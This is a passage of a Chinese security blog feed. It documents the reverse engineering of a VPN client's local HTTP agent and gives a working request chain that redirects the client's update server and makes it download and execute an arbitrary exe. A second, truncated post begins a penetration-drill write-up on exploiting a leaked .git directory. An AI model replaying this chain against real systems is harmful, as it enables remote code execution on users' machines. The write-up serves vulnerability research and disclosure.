        SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)

Handler = ServerHandler

httpd = BaseHTTPServer.HTTPServer((&apos;0.0.0.0&apos;, 8000), Handler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile=&apos;./server.pem&apos;, server_side=True)
httpd.serve_forever()
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;最终如上脚本支持&lt;code&gt;POST&lt;/code&gt;方法，当时用&lt;code&gt;POST&lt;/code&gt;方法请求时即返回文件内容。&lt;/p&gt;

&lt;p&gt;最后，拖一个&lt;code&gt;calc.exe&lt;/code&gt;（计算器）到HTTPS网站根目录下的&lt;code&gt;/com/win/XXXUD.exe&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;依次请求（&lt;strong&gt;经过多次复现发现，这三个请求才是重点的，其他的可以忽略&lt;/strong&gt;）：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;https://127.0.0.1:54530/ECAgent/?op=InitECAgent&amp;amp;arg1=172.20.10.2 8000&amp;amp;callback=EA_cb10000

https://127.0.0.1:54530/ECAgent/?op=CheckReLogin&amp;amp;arg1=3408a894633162c62188f98e92a221967dccfa5aafbd79b576714b4d1c392a4ad4b220d698efcd939c3b1b37467023e9380ee3abf0e492ee2efc736de757b80e973fe4c7d8af1af211a3f7ff3433cd9de975c76583efe7251dd1c0656f4384832998630359b65beb131cd8d287712462fa1b9e9acbc96dcc678b84cd57178c1a&amp;amp;token=50065256e83ff1bb9e01757d0d22b669&amp;amp;callback=EA_cb10003

https://127.0.0.1:54530/ECAgent/?op=UpdateControls&amp;amp;arg1=BEFORELOGIN&amp;amp;callback=EA_cb10005
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;会发现客户端请求之后，将文件下载到本地并启动该程序，成功弹出计算器：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234504.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;白盒逆向侧&quot;&gt;白盒（逆向）侧&lt;/h2&gt;

&lt;p&gt;我从白盒（逆向）侧的角度，带入Web漏洞挖掘思维，在不完全分析伪代码的情况下&lt;strong&gt;推理&lt;/strong&gt;出漏洞。（仅尝试带入，非实战，不喜勿喷）&lt;/p&gt;

&lt;h3 id=&quot;http服务的建立&quot;&gt;HTTP服务的建立&lt;/h3&gt;

&lt;h4 id=&quot;确定进程&quot;&gt;确定进程&lt;/h4&gt;

&lt;p&gt;首先进行某客户端程序的安装并启动客户端程序，然后需要使用Process Hacker之类的工具查看进程树，根据某独有的特征关键词&lt;code&gt;XXX&lt;/code&gt;找到打开的进程。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302092752.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接着根据进程查看其是否启用了网络服务（端口开放），我找到了&lt;code&gt;ECAgent.exe&lt;/code&gt;这个进程，并且观察到其启用了&lt;code&gt;54530&lt;/code&gt;端口：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220301141006.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;尝试以HTTP/HTTPS形式访问该端口，发现HTTPS访问有具体返回内容：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302093515.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;故此判断该进程所启用端口为HTTP服务。&lt;/p&gt;

&lt;h4 id=&quot;寻找入口&quot;&gt;寻找入口&lt;/h4&gt;

&lt;p&gt;现在需要找到程序开启HTTP服务的入口点，由此才能继续去跟进整个程序的逻辑，我第一时间想到的是加载的DLL文件，选择x32dbg附加进程查看其所加载的DLL文件：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302132429.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里有很多系统的DLL文件，可以略过，优先查看与&lt;code&gt;ECAgent.exe&lt;/code&gt;有关联性的DLL文件，例如其同级目录下的几个DLL（也都被加载了）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302132839.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;通过IDA打开这些DLL文件，并使用关键词&lt;code&gt;127.0.0.1&lt;/code&gt;、&lt;code&gt;0.0.0.0&lt;/code&gt;、&lt;code&gt;54530&lt;/code&gt;搜索相关数据，找到对应使用的代码（F5伪代码，如下图中函数地址不一致时因为我在调试过程中进行了REBASE）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220301141941.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;如上图代码中，很明显这是WINSOCK编程的写法，其中的结构体&lt;code&gt;sockaddr&lt;/code&gt;实际上等价于&lt;code&gt;sockaddr_in&lt;/code&gt;，二者唯一的区别是&lt;code&gt;sockaddr_in&lt;/code&gt;结构体有明确的成员去指定IP、端口，而&lt;code&gt;sockaddr&lt;/code&gt;结构体则是使用成员&lt;code&gt;sa_data&lt;/code&gt;（这是一个数组）去包含IP、端口之类的信息。&lt;/p&gt;

&lt;p&gt;如下图所示，就是一个两结构体之间的对应图，端口存放在&lt;code&gt;sa_data&lt;/code&gt;的第0、1位，IP存放在&lt;code&gt;sa_data&lt;/code&gt;的第2、3、4、5位：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302134038.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;但是在这里，实际环境中的代码对应的端口居然为0，实际测试，发现这样的赋值是无法创建成功的：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302134453.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;我陷入了沉思，莫非是找错位置了？并不是这个DLL文件去开启的Web服务？带着这一份沉思去找了很多个DLL，发现它们要么是0，要么就是其他端口，而不是对应的&lt;code&gt;54530&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;在不断的试错之后，我发现了自己从未去看过&lt;code&gt;ECAgent.exe&lt;/code&gt;本身，而尝试去&lt;code&gt;ECAgent.exe&lt;/code&gt;搜索字符串时，也没有什么收获，于是想着既然一个DLL中用到了WINSOCK的库去创建SOCKET，那么应该都会这样去编写，所以尝试使用创建SOCKET服务特有的函数名&lt;code&gt;bind&lt;/code&gt;去全局搜索，搜索结果如下图所示：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302135614.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接下来就是一个一个函数跟进去查看，最终我发现了它&lt;code&gt;sub_47FD60&lt;/code&gt;，如下图所示，&lt;code&gt;sub_47FD60&lt;/code&gt;是创建SOCKET的函数，但是绑定的端口是入参，所以我需要找到调用该函数的函数，也就是&lt;code&gt;sub_47FEB0&lt;/code&gt;，这个函数会使用一个循环，入参的端口也会随着循环递增（应该是为了防止端口冲突的情况），当创建SOCKET成功之后就直接返回。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302140849.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;将这段伪代码编译执行一下，输出结果，就发现第一个入参的端口是&lt;code&gt;54530&lt;/code&gt;，并且理论上不会有其他的软件占用这个端口，所以，我认为&lt;code&gt;ECAgent.exe&lt;/code&gt;的HTTP服务端口就是&lt;code&gt;54530&lt;/code&gt;。&lt;/p&gt;

&lt;h3 id=&quot;接口参数的处理逻辑&quot;&gt;接口参数的处理逻辑&lt;/h3&gt;

&lt;p&gt;分析完HTTP服务的建立之后，我想要知道其具体如何处理请求参数，可以在此函数基础上继续回溯追踪调用链，但是这样的工作量是巨大的，不适合快速分析，所以我首先根据HTTP服务的响应字符串于IDA中搜索，再根据字符串的XREF，找到其对应使用到的函数：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220302180222.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;如上图所示代码，大概意思就是有一个数组，存入了字符串和函数地址，根据入参进行类似对比，而后去调用函数。&lt;/p&gt;

&lt;p&gt;在这里第二个参数&lt;code&gt;a2&lt;/code&gt;至关重要（它在条件判断、函数入参中都被使用到），所以我接着跟该函数的XREF，找到传递参数&lt;code&gt;v26&lt;/code&gt;：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220303093911.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;跟进处理过&lt;code&gt;v26&lt;/code&gt;的函数，&lt;code&gt;sub_48E2C0&lt;/code&gt;函数打开了世界的大门，根据其函数的输出字符串和代码，此函数大概表达意思就是去解析URL中的请求参数：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220303094307.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;所以，这里我就可以列出这几个参数：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;op
token
callback
guid
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;将参数带入URL中，分别加上&lt;code&gt;123&lt;/code&gt;参数值去访问：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;https://127.0.0.1:54530/?op=123
https://127.0.0.1:54530/?token=123
https://127.0.0.1:54530/?callback=123
https://127.0.0.1:54530/?guid=123
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220303100233.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;如上图所示，请求参数&lt;code&gt;callback&lt;/code&gt;有对应的反回信息，尝试进行XSS无果，接着在IDA中搜索&lt;code&gt;callback&lt;/code&gt;字符串找找是否有对应的逻辑，发现了多个URL的地址：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220303102028.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这些URL地址证明了参数&lt;code&gt;op&lt;/code&gt;、&lt;code&gt;token&lt;/code&gt;、&lt;code&gt;callback&lt;/code&gt;可以搭配在一块去请求使用，我于此处逐渐递减参数访问（考虑到&lt;code&gt;token&lt;/code&gt;参数可能会存在鉴权等操作）：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;https://127.0.0.1:54530/?op=__restart_ecagent__&amp;amp;token=123&amp;amp;callback=123
https://127.0.0.1:54530/?op=__restart_ecagent__&amp;amp;token=123
https://127.0.0.1:54530/?op=__restart_ecagent__
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;最终发现，这三条请求都可以使得&lt;code&gt;ECAgent.exe&lt;/code&gt;进程重启，而&lt;code&gt;op=__stop_ecagent__&lt;/code&gt;则测试可以停止&lt;code&gt;ECAgent.exe&lt;/code&gt;进程。&lt;/p&gt;

&lt;h4 id=&quot;输入参数&quot;&gt;输入参数&lt;/h4&gt;

&lt;p&gt;简单梳理完接口参数的处理逻辑之后，我对&lt;code&gt;op&lt;/code&gt;值对应的函数都看了下，有很多函数无法通过静态的方式去分析，但根据字面意思也能理解个大概：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;v7 = &quot;__check_alive__&quot;;
v8[0] = (int)sub_48F700;
v8[1] = (int)&quot;CheckRelogin&quot;; // 检查重新登录
v8[2] = (int)sub_4935E0;
v8[3] = (int)&quot;DoConfigure&quot;; // 做配置
v8[4] = (int)sub_490800;
v8[5] = (int)&quot;GetConfig&quot;; // 获取配置
v8[6] = (int)sub_48FB30;
v8[7] = (int)&quot;InitECAgent&quot;; // 初始化ECAgent
v8[8] = (int)sub_48F720;
v8[9] = (int)&quot;GetEncryptKey&quot;; // 获取加密key
v8[10] = (int)sub_493540;
v8[11] = (int)&quot;Setter&quot;;
v8[12] = (int)sub_493960;
v8[13] = (int)&quot;Getter&quot;;
v8[14] = (int)sub_494190;
v8[15] = (int)&quot;__restart_ecagent__&quot;; // 重启ECAgent
v8[16] = (int)sub_4903E0;
v8[17] = (int)&quot;__stop_ecagent__&quot;; // 停止ECAgent
v8[18] = (int)sub_491510;
v8[19] = (int)&quot;DetectECAgent&quot;; // 检测ECAgent
v8[20] = (int)sub_48F6C0;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;但有些操作肯定是需要另外一个参数去赋值配合的，所以我根据之前获取的参数列表在IDA中搜索字符串，我发现在这些参数中夹杂着一个双字&lt;code&gt;dd -&amp;gt; Define Double Word&lt;/code&gt;，IDA没有将它直接解析出来：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304094407.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;我选中它按下快捷键&lt;code&gt;A&lt;/code&gt;将其转为字符串形式，得到了字符串&lt;code&gt;arg&lt;/code&gt;：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304095308.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;既然是与参数在一块的，那么我也将其作为参数添加到URL中，并与添加参数之前的URL，分别请求对比响应：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;https://127.0.0.1:54530/?op=CheckRelogin
https://127.0.0.1:54530/?op=DoConfigure
https://127.0.0.1:54530/?op=GetConfig
https://127.0.0.1:54530/?op=InitECAgent
https://127.0.0.1:54530/?op=GetEncryptKey

https://127.0.0.1:54530/?op=CheckRelogin&amp;amp;arg=123
https://127.0.0.1:54530/?op=DoConfigure&amp;amp;arg=123
https://127.0.0.1:54530/?op=GetConfig&amp;amp;arg=123
https://127.0.0.1:54530/?op=InitECAgent&amp;amp;arg=123
https://127.0.0.1:54530/?op=GetEncryptKey&amp;amp;arg=123
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;CheckRelogin，添加前提示&lt;code&gt;invalid param count&lt;/code&gt;，添加后就不提示：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304111032.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;DoConfigure，添加前返回为空，添加后返回有内容：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304111231.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;GetConfig，添加前返回有内容，添加后返回为空：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304111325.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;InitECAgent，添加前返回为空，添加后返回有内容，并提示&lt;code&gt;CSCM_EXIST, init ok&lt;/code&gt;：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304111430.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;GetEncryptKey，添加前后返回内容没有变化：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304132748.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;根据对比， &lt;code&gt;arg&lt;/code&gt;确实可以作为参数去请求，但具体是什么意义，还需要去看功能实现，由于我水平有限，在阅读静态代码时遇到很多坎，所以根据自己的大概理解，判断出该程序会输出Log日志。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304112207.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;于是在磁盘文件中去寻找Log文件，最终在&lt;code&gt;C:\Users\chen\AppData\Roaming\XXX\SSL\Log&lt;/code&gt;中找到了输出日志：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304112256.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;根据&lt;code&gt;ECAgent.exe.log&lt;/code&gt;日志记录可以看出程序处理的逻辑：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304112633.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;CheckRelogin对arg参数进行了解密；&lt;/li&gt;
  &lt;li&gt;GetConfig根据arg参数进行读取配置；&lt;/li&gt;
  &lt;li&gt;InitECAgent根据arg参数配置了VPN地址（HTTPS）。&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;CheckRelogin解密正好对应着GetEncryptKey的返回加密信息，于是尝试带入并根据日志发现记录的信息不一样了，所以在这里我暂时将其搁置：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304133139.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接着来看配置VPN客户端的服务地址，尝试请求如下地址，将服务器地址指向我的机器：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;https://127.0.0.1:54530/?op=InitECAgent&amp;amp;arg=172.20.10.3
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;随后去请求其他&lt;code&gt;op&lt;/code&gt;参数值的地址，偶然间发现请求如下地址（GetConfig的arg参数为0或字符串）：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;https://127.0.0.1:54530/?op=GetConfig&amp;amp;arg=abc
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;VPN客户端会去请求&lt;code&gt;https://172.20.10.3/com/WindowsModule.xml&lt;/code&gt;，如下图所示就是客户端请求服务端的HTTP日志：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304125709.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;并且会将该文件的XML格式转为JSON格式输出：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304125819.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;其他动作&quot;&gt;其他动作&lt;/h4&gt;

&lt;p&gt;按照正常逻辑来说，既然可以远程读取服务器配置，应该会有一些其他的操作，例如更新、下载，于是我在IDA中继续寻找，发现了一段字符串：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304131819.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;v23 = &quot;__check_alive__|GetEncryptKey|DoConfigure#SET LANG|DoQueryService#QUERY LANG|InitECAgent|CheckRelogin|Logout|CheckMITMAttack|SelectLines|DetectECAgent|CheckProxySetting|UpdateControls#BEFORELOGIN|DoQueryService#QUERY CONTROLS UPDATEPROCESS|DoQueryService#QUERY DKEY_DETECT|DoQueryService#QUERY LOGINSTATUS|OpenBrowser|StartEasyConnect|DoQueryService#QUERY NEEDUPDATE&quot;;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;在该字符串中许多之前发现的都存在其中，当然也有很多没有见过的，我梳理了一下没有见过的字符串：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;DoConfigure#SET LANG
DoQueryService#QUERY LANG
Logout
CheckMITMAttack
SelectLines
CheckProxySetting
UpdateControls#BEFORELOGIN
DoQueryService#QUERY CONTROLS UPDATEPROCESS
DoQueryService#QUERY DKEY_DETECT
DoQueryService#QUERY LOGINSTATUS
OpenBrowser
StartEasyConnect
DoQueryService#QUERY NEEDUPDATE
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;很奇怪的是这些字符串之后还有一个&lt;code&gt;#&lt;/code&gt;号，例如&lt;code&gt;DoConfigure&lt;/code&gt;，按照我的推测是去设置配置信息的，此处后面跟了一个&lt;code&gt;#&lt;/code&gt;号+&lt;code&gt;SET LANG&lt;/code&gt;，根据字面意思第一时间想到了这可能是设置语言，但如何设置？尝试了一下，此处可以带进&lt;code&gt;arg&lt;/code&gt;参数，按照字面意思&lt;code&gt;SET LANG&lt;/code&gt;之后应该还需要有参数值，所以请求参数值改为&lt;code&gt;SET LANG 123&lt;/code&gt;，接着按照字面意思发现配合&lt;code&gt;DoQueryService#QUERY LANG&lt;/code&gt;可以查询出来：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304135649.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;同样，我在之前的发现中发现可以去配置VPN服务IP地址，在IP之后加上空格也可以配置指定端口：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;https://127.0.0.1:54530/?op=InitECAgent&amp;amp;arg=172.20.10.3 443
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;远程下载rce&quot;&gt;远程下载（RCE）&lt;/h3&gt;

&lt;p&gt;接着来看我最关心的&lt;code&gt;UpdateControls#BEFORELOGIN&lt;/code&gt;，其字面意思就是在登陆前进行更新，那么具体更新了什么呢？我尝试请求如下URL并查看是否存在网络的连接（需要先请求InitECAgent）：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;https://127.0.0.1:54530/?op=UpdateControls&amp;amp;arg=BEFORELOGIN
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;在HTTP服务端成功的收到了请求日志，可以看见客户端请求了很多个路径，并以POST形式请求了&lt;code&gt;/com/win/XXXUD.exe&lt;/code&gt;文件：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304144029.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;经过测试发现其会去主动下载该EXE并替换原XXXUD.exe文件，接着执行打开：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020220304144714.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;就这样我成功发现了一条RCE链：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// 改变VPN客户端服务的IP地址和端口
https://127.0.0.1:54530/?op=InitECAgent&amp;amp;arg=172.20.10.3 443
// 让VPN客户端发起下载更新，并执行更新文件
https://127.0.0.1:54530/?op=UpdateControls&amp;amp;arg=BEFORELOGIN
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;文末&quot;&gt;文末&lt;/h2&gt;

&lt;p&gt;我在真实逆向过程中踩了很多坑，也由于自身缺少逆向经验和强有力的水准，只能模拟黑盒的经验和套路带入到逆向中。&lt;/p&gt;

&lt;p&gt;虽然这只是一次逆向挖掘模拟，但在这过程中我掌握了之前黑盒所无法知晓的细节，并且对比黑、白盒的过程和结果，会发现逆向侧最后实际的PoC根本不需要&lt;code&gt;/ECAgent/&lt;/code&gt;目录，&lt;code&gt;arg1&lt;/code&gt;参数也变成了&lt;code&gt;arg&lt;/code&gt;参数，并且RCE链的请求，从原本的3条请求变成了2条请求。（也许可以Bypass一些WAF）&lt;/p&gt;

&lt;p&gt;最后我将这类漏洞称之为Web2Pwn，也就是基于Web通道达到应用侧（非Web）漏洞触发的目的。例如你可以通过HTTP服务访问触发执行CreateProcess函数，亦或者通过HTTP服务访问触发溢出漏洞。&lt;/p&gt;
</description>
          <pubDate>2021-05-05T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2021-05-05/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2021-05-05/1</guid>
        </item>
      
    
      
        <item>
          <title>记一次攻防演习渗透过程</title>
          <description>&lt;h1 id=&quot;记一次攻防演习渗透过程&quot;&gt;记一次攻防演习渗透过程&lt;/h1&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;记录一次攻防演习渗透过程，文章仅写关于「打点」环节的部分，也就是拿到靶标的Webshell为止。&lt;/p&gt;

&lt;p&gt;任务: 拿到XXX业务系统权限…&lt;/p&gt;

&lt;h2 id=&quot;过程&quot;&gt;过程&lt;/h2&gt;

&lt;p&gt;靶标是一个www的域名，简单看了下有机会硬啃（商业源码），但时间不多，先找找脆弱点，常规一套流程，收集子域、C段…&lt;/p&gt;

&lt;h3 id=&quot;脆弱点发现&quot;&gt;脆弱点发现&lt;/h3&gt;

&lt;p&gt;在对子域的常规扫描后，发现存在&lt;code&gt;.git&lt;/code&gt;泄露:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054609733881.jpg&quot; alt=&quot;-w494&quot; /&gt;&lt;/p&gt;

&lt;p&gt;以及发现了&lt;code&gt;phpMyAdmin&lt;/code&gt;应用和一些&lt;code&gt;phpinfo()&lt;/code&gt;信息泄漏:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054610914733.jpg&quot; alt=&quot;-w865&quot; /&gt;&lt;/p&gt;

&lt;p&gt;看到这些，不由得兴奋了起来，接下来只要按照预期的想法: 通过&lt;code&gt;.git&lt;/code&gt;拿到数据库账号密码（源码中一般会有），登录&lt;code&gt;phpMyAdmin&lt;/code&gt;，然后拿到&lt;code&gt;Webshell&lt;/code&gt;…&lt;/p&gt;

&lt;p&gt;但…转折点来了，尝试使用&lt;code&gt;GitHack&lt;/code&gt;等一系列常见工具去恢复&lt;code&gt;.git&lt;/code&gt;，发现恢复的文件只有一些图片，看&lt;code&gt;Logs&lt;/code&gt;发现有很多文件恢复失败，既然不能当一个&lt;code&gt;ScriptKid&lt;/code&gt;一把梭哈，那就自己来手动恢复吧~&lt;/p&gt;

&lt;h3 id=&quot;git原理与恢复&quot;&gt;Git原理与恢复&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;基本概念&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Git有三个概念词需要了解: 1.工作区 2.版本库 3.暂存区&lt;/p&gt;

&lt;p&gt;工作区就是正常的目录（你的项目位置）;版本库就是在工作区内的一个隐藏目录&lt;code&gt;.git&lt;/code&gt;;如果你曾经注意过这个目录你会发现里面有许多东西，在该目录下会存在一个&lt;code&gt;index&lt;/code&gt;文件，这被称之为暂存区。&lt;/p&gt;

&lt;p&gt;除以上所述之外，大家都知道每一个Git项目都会有一个默认的分支&lt;code&gt;master&lt;/code&gt;，在&lt;code&gt;.git&lt;/code&gt;目录下有一个文件&lt;code&gt;head&lt;/code&gt;，它用来指向&lt;code&gt;master&lt;/code&gt;这个分支。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054630957919.jpg&quot; alt=&quot;-w992&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当我们使用&lt;code&gt;git add&lt;/code&gt;时，实际上就是把文件添加进暂存区；使用&lt;code&gt;git commit&lt;/code&gt;时，才会把暂存区的内容添加到当前分支，默认是&lt;code&gt;master&lt;/code&gt;分支。&lt;/p&gt;

&lt;p&gt;我们可以来实际的看一下&lt;code&gt;index&lt;/code&gt;和&lt;code&gt;head&lt;/code&gt;这两个文件:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-11-22/16054636119175.jpg&quot; alt=&quot;-w1108&quot; /&gt;&lt;/p&gt;

&lt;p&gt;使用&lt;code&gt;Binwalk&lt;/code&gt;直接分析，可以很直观的看见&lt;code&gt;index&lt;/code&gt;内有许多内容，&lt;code&gt;head&lt;/code&gt;并没有，直接&lt;code&gt;cat head&lt;/code&gt;发现这就是一个单纯的文本内容:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;ref: refs/heads/master
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;前面了解到这是一个分支指向，那我直接查看&lt;code&gt;.git&lt;/code&gt;目录下的&lt;code&gt;refs/heads/master&lt;/code&gt;文件，得到一串Hash值。&lt;/p&gt;

&lt;p&gt;我们可以暂且认为这是&lt;code&gt;master&lt;/code&gt;分支的一个记录，用于区分、比较。&lt;/p&gt;

&lt;p&gt;大概了解了以上内容后，还需要了解有哪些文件才能够恢复&lt;code&gt;.git&lt;/code&gt;?&lt;/p&gt;

&lt;p&gt;首先我们来看一下&lt;code&gt;.git&lt;/code&gt;目录内的一般结构:&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;名称&lt;/th&gt;
      &lt;th&gt;类型&lt;/th&gt;
      &lt;th&gt;作用&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;.git/index&lt;/td&gt;
      &lt;td&gt;文件&lt;/td&gt;
      &lt;td&gt;暂存区&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;.git/config&lt;/td&gt;
      &lt;td&gt;文件&lt;/td&gt;
      &lt;td&gt;Git配置文件&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;.git/description&lt;/td&gt;
      &lt;td&gt;文件&lt;/td&gt;
      &lt;td&gt;GitWeb专用的描述文件&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;.git/info&lt;/td&gt;
      &lt;td&gt;文件夹&lt;/td&gt;
      &lt;td&gt;里面就一个exclude文件（与.gitignore互补），排除指定文件不用做Git提交&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;.git/hooks&lt;/td&gt;
      &lt;td&gt;文件夹&lt;/td&gt;
